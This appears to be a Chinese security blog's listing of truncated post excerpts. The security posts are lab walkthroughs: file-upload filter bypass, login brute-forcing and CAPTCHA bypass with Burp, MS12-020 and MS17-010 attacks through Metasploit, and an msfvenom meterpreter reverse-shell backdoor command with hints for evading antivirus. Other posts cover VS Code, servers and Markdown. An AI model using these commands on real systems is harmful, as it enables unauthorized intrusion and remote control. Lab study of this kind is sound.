file-upload
通过前面的爆破和这次上传就发现,后端校验比前端校验更安全,更可靠,一切在前端做的安全措施都是不靠谱的,仅起到辅助作用,但是前端校验可以增加用户体验。也就是一句话“前端校验防君子,后端校验防小人”😀点击去另外爆破篇
client check首先上传,弹出只能上传图片,查看一下源码查看源码,上传位置有HTML onchange该元素 “在元素值改变时触发”
script :onchange发生时运行的脚本
将“checkFileExt(this.value)“属性删除,再次上传php就成功了
MIME typeMIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式。点击可前往具体介绍MIME
尝试上传 kk.php ,毫无意外传不上去在HTTP中,MIME类型被定义在 Content-Type head ...
记录一次靶场
基于表单的暴力破解
输入任意尝试,使用burp抓包清除默认payload,手动添加payload,发送给攻击器,选择第四个攻击方式设置好1和2 的配置文件(字典),也可手动添加看到了结果,响应长度明显不一样,输入admin 123456 登录成功
验证码绕过(on server)
可以看到验证码调用的是后端showvcode.php代码完成的一张图片那么只改变用户名和密码,虽然报错,但验证码可反复重复使用,还是老样子发送到intruder测试成功admin 123456 因此和第一个也就多了一个验证码php图片验证。基本一样
验证码绕过(on client)验证码通过前端js完成,查看验证码有createCode函数往下找,定义是选择数组里面5个组合完成反复尝试了一下,发现无论输入错误验证码,或者为空,都返回用户域名username or password is not exists~(用户名或密码不存在)此时验证码就不起作用了,验证码完全交给前端,后端并没有验证工作,因此还是只爆破用户名和密码就行了。剩下的和之前一样,省略一些步骤了,直接看结果
token防爆破有关token简单介 ...
vscode安装
前言最近我发现自己pc缺少稳定的编辑器,我之前用过DW,使用拖拽控制的方式,挺有意思。我差点把AD全家桶下载下来,只怪当时内存不够。还有HBuilder,毕竟是国内的。这两款之前都接触过,最终还是推荐微软公司开发的vscode编辑器且免费。文件不大。插件安装简单。按需下载。话不多说下载~
下载打开官网https://code.visualstudio.com/识别电脑系统,直接点击下载描述(可选)
安装这里我全部勾选,方便后期使用体验,嘿嘿安装很快以上勾选之后,再次打开项目就有多种选择。命令行输入 code . 或直接右键
插件打开插件商店(ctrl+shift+x),安装
预览打开项目时候,不能预览似乎好笨拙,所以用下面这个插件,搜索:open in browser可直接预览输入:alt + b,可直接运行,
实时更新上面不能实时预览,要手动更新。而这个插件可实现实时更新。Live Server(前提打开文件所在的目录文件夹,才可正常使用)截图可以看到紧挨着有个Live Server Preview,该插件可以在vscode里,进行浏览。再次输入直接实时更新,不用在手动刷新了
生 ...
MS12-020
实验工具 Vm虚拟机Kali攻击机 192.168.137.128Win7靶机 192.168.137.147
连通性测试
启动模块在kali终端输入msfconsole启动模块
输入命令利用 MS12-020 漏洞,输入命令search ms12_020
执行利用‘1‘的漏洞,use引用漏洞路径,利用了rdp协议的一种漏洞,输入命令use auxiliary/dos/windows/rdp/ms12_020_maxchannelids,也可直接 use 1 回车执行。
引用引用后,输入show options查看漏洞配置内容。
配置 使用了3389端口,配置rhosts即可,该漏洞利用rdp协议,rport不需要修改,输入命令,set rhosts IP地址,IP地址为Windows 7虚拟机的IP192.168.137.147。
运行输入run运行,回到Windows 7发现虚拟机蓝屏,证明search ms12_020漏洞攻击成功。
补充:刚开始做的时候没成功,查看一下远程设置,端口,系统保护机制,由于这是win7版本,较老的机型我没做。不过原理一样。当然现在只是学习参考 ...
MSF
Msf后门植入木马监听 拿到权限之后 放到后台运行:background以下命令生成远程可控后门。Payload 是攻击机IP 192.168.137.1401msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.137.140 lport=9999 -f exe -o kkhelp.exe此时看到桌面生成 木马文件,那么改如何上钩呢,这里我就自己主动当诱饵使用模块使用模块 use exploit/multi/handler 进行监听这里我输错了了好几次,一定细心。
成功免杀以上生成的计算机直接给我杀掉了,以过火绒为例,不会百分百成功偶;可以加壳:压缩壳,加密壳
MS17-010
Msf永恒之蓝复现
靶机IP:192.168.137.141 攻击机你猜🚀扫描存活主机以及端口: Nmap -Pn 192.168.137.130-140打开漏洞利用框架 metasploit framework search ms17-010 发现一个模块使用模块 use 0Use 0 使用漏洞 命名编号为0 #show options 查看配置项RHOSTS 显示yes 远程登陆的主机就是payload:set RHOSTS 192.168.137.141运行:run获得权限攻击成功
搭建整理
服务器服务器指的是网络环境下为客户机(Client)提供某种服务的专用计算机,服务器安装有网络操作系统和各种服务器应用系统软件(如Web服务、电子邮件服务)的计算机。服务器具有高速的CPU运算能力、长时间的可靠运行、强大的I/O外部数据吞吐能力以及更好的扩展性。
根据服务器的分类,大致有独立服务器(即所谓的物理服务器)、虚拟主机、虚拟专用服务器VPS、云服务器这几种。
服务器的特性:
可扩展性易使用性可用性易管理性还是推荐国内正儿八经的,比如腾讯,阿里,百度,华为,都可,尽量别用那些听都没听过的,我都见到的十几个了,这云那云的。
CDN全称是Content Delivery Network,CDN 是构建在数据网络上的一种分布式的内容分发网。 CDN 的作用是采用流媒体服务器集群技术,克服单机系统输出带宽及并发能力不足的缺点,可极大提升系统支持的并发流数目,减少或避免单点失效带来的不良影响。
作用1、节省骨干网带宽、降低带宽的需求量、节约成本。2、加速功能,解决由于用户访问量大造成的服务器过载问题。3、克服网站分布不均,降低网站建设和维护成本。4、提高网络稳定性。5、可以隐藏源站, ...
MD与外挂标签
Markdown基本语法标题标签语法参考样式123456#一级标题##二级标题###三级标题####四级标题#####五级标题######六级标题见文章侧边栏
字体标签语法参考样式1234*倾斜的字体* 倾斜的字体**加粗的字体** 加粗的字体**斜体加粗的字体** 斜体加粗的字体~~加删除线的字体~~ 加删除线的字体倾斜的字体加粗的字体斜体加粗的字体加删除线的字体
颜色要在 Markdown 中改变字体颜色,可以使用HTML的标签。不过,需要注意的是,在新版的 HTML 标准中, 标签已经被废弃,不再建议使用。以下是使用 标签改变字体颜色的语法:标签语法参考样式123456789101112浅红色文字:<font color="#dd0000">浅红色文字</font><br /> 深红色文字:<font color="#660000">深红色文字</font><br /> 浅绿色文字:<font color="#00dd00"> ...